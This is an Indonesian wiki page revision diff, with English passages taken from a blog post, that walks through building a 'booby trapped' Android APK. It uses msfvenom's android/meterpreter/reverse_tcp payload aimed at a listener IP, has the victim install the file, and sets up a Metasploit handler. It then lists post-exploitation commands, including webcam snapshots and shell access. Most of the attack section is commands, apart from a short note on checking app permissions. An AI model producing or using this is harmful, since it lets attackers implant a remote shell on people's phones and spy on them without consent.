|
|
| (2 intermediate revisions by the same user not shown) |
| Line 5: |
Line 5: |
| Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan | | Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan |
|
| |
|
| sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk | | sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk |
|
| |
|
| Masukan IP address Kali Linux & Port-nya. | | Masukan IP address Kali Linux & Port-nya. |
|
| |
|
| Setelah perintah di atas di jalankan, maka akan dibuat file app.apk.
| | ==Di sisi smartphone== |
| | |
| | * Copy / kirim file app.apk di Android device. |
| | * Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source". |
|
| |
|
| Copy / kirim file app.apk di Android device. Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
| |
|
| |
|
|
| |
|
| ==Di sisi Kali Linux== | | ==Di sisi Kali Linux== |
|
| |
|
| | Di CLI, ketik |
|
| |
|
| | msfconsole |
|
| |
|
| 4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
| | Jalankan perintah |
| | |
| 5. Once Metasploit starts, type in the following to create a listener:
| |
|
| |
|
| user exploit/multi/handler | | user exploit/multi/handler |
| Line 26: |
Line 28: |
| set lhost 192.168.1.16 (enter your Kali IP address) | | set lhost 192.168.1.16 (enter your Kali IP address) |
| set lport 4444 | | set lport 4444 |
| | exploit1 |
|
| |
|
| Then just type exploit to start the handler:
| | ==Attack== |
| | |
| exploit1
| |
| | |
| 6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.
| |
| | |
| 7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.
| |
| | |
| On your Metaploit system you should see this:
| |
| | |
| Reverse TCP session
| |
| | |
| An active session is created and it drops you automatically into a meterpreter prompt.
| |
| | |
| 8. From here your can type “sysinfo” to get information on the device:
| |
| | |
| sysinfo
| |
| | |
| 9. You can see the processes running by typing, “ps”:
| |
| | |
| PS command
| |
| | |
| You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.
| |
| | |
| Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.
| |
| | |
| Typing “help” at a meterpreter prompt will list all the command that are available.
| |
| | |
| We can also run the shell command that will drop us into a direct Terminal shell if we want:
| |
| | |
| meterpreter > shell
| |
| Process 1 created.
| |
| Channel 1 created.
| |
| ls
| |
| | |
| The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.
| |
| | |
| But if the phone was rooted, I should have been able to access them… Remotely…
| |
| | |
| This should be noted by people who have rooted their phone!
| |
| | |
| And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…
| |
| | |
| Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
| |
| | |
| What’s next with Android support on Meterpreter?
| |
| | |
| Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:
| |
| | |
| Pretty amazing stuff!
| |
| | |
| | |
| | |
| | |
| | |
|
| |
|
| | sysinfo - informasi tentang device |
| | ps - linux / android ps command |
| | webcam_list - list webcam yang ada |
| | webcam_snap - snapshot webcam |
| | shell - kalau membutuhkan shell (untuk device yang sudah di root) |
|
| |
|
|
| |
|
sumber: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html
Membuat booby trapped APK file
Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk
Masukan IP address Kali Linux & Port-nya.
Di sisi smartphone
- Copy / kirim file app.apk di Android device.
- Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".
Di sisi Kali Linux
Di CLI, ketik
msfconsole
Jalankan perintah
user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444
exploit1
Attack
sysinfo - informasi tentang device
ps - linux / android ps command
webcam_list - list webcam yang ada
webcam_snap - snapshot webcam
shell - kalau membutuhkan shell (untuk device yang sudah di root)
Referensi
